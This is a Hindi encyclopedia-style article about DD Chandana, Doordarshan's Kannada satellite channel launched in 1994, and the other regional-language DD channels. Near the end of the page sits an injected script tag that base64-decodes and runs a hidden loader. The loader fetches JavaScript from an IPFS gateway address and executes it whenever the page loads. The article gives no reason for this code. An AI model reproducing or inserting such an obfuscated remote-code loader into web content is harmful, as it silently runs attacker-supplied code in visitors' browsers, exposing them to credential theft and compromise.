डीडी चन्दना (चैनल)

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
डीडी चन्दना (चैनल)
डीडी चन्दना
विवरण 'डीडी चन्दना चैनल' कन्नड़ भाषा का उपग्रह चैनल है। कर्नाटक की 81.7 प्रतिशत जनसंख्या को इसके कार्यक्रम उपलब्ध हैं।
देश भारत
शुरुआत 1994
दूरदर्शन स्टुडियो बंगलौर और गुलबर्गा में
संबंधित लेख दूरदर्शन
अन्य जानकारी इसके प्रमुख कार्यक्रमों में धारावाहिक, सूचना एवं मनोरंजन के कार्यक्रम, समाचार एवं सामयिकी, सामाजिक कार्यक्रम और फिल्म संबंधी कार्यक्रम शामिल हैं।

डीडी चन्दना दूरदर्शन के क्षेत्रीय भाषा उपग्रह चैनलों के अंतर्गत कन्नड़ भाषा का उपग्रह चैनल है।

  • इस चैनल की सहायता के लिए बंगलौर और गुलबर्गा में दूरदर्शन स्टुडियो हैं।
  • वर्ष 1994 में आरम्भ किए गए 'डीडी चन्दना चैनल' पर प्रसारित होने वाले प्रमुख कार्यक्रमों में मनोरंजन धारावाहिक, सूचना एवं मनोरंजन के कार्यक्रम, समाचार एवं सामयिकी, सामाजिक कार्यक्रम और फिल्म संबंधी कार्यक्रम शामिल हैं।
  • स्थलीय मोड में 'डीडी चन्दना' के कार्यक्रम कर्नाटक की 81.7 प्रतिशत जनसंख्या को उपलब्ध हैं।

क्षेत्रीय भाषा उपग्रह सेवा

सभी दूरदर्शन केन्द्र अपनी-अपनी संबंधित क्षेत्रीय भाषाओं में कार्यक्रमों का निर्माण करते हैं। क्षेत्रीय 'भाषा उपग्रह सेवा' और 'क्षेत्रीय राज्य नेटवर्क' विभिन्न प्रकार के कार्यक्रम प्रसारित करते हैं, जिनमें लोगों के साथ उनकी अपनी भाषाओं में सम्पर्क स्थापित करने के लिए विकासात्मक समाचार, धारावाहिक, वृत्तचित्र, समाचार एवं सामयिकी कार्यक्रम सम्मिलित हैं। संबंधित राज्यों में क्षेत्रीय भाषा के कार्यक्रम 'डीडी नेशनल' की रिजनल विन्डो के दौरान स्थलीय मोड में तथा क्षेत्रीय भाषा उपग्रह चैनलों पर पूरे देश में चौबीस घंटे उपलब्ध होते हैं। 'क्षेत्रीय भाषा उपग्रह सेवा' के अन्तर्गत 'डीडी चन्दना' के अतिरिक्त निम्नलिखित चैनल आते हैं-

  1. डीडी नॉर्थ ईस्ट
  2. डीडी उड़िया
  3. डीडी पोढ़िगै
  4. डीडी पंजाबी
  5. डीडी सहयाद्रि
  6. डीडी सप्तगिरि
  7. डीडी बांग्ला
  8. डीडी गुजराती
  9. डीडी कशीर
  10. डीडी मलयालम


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख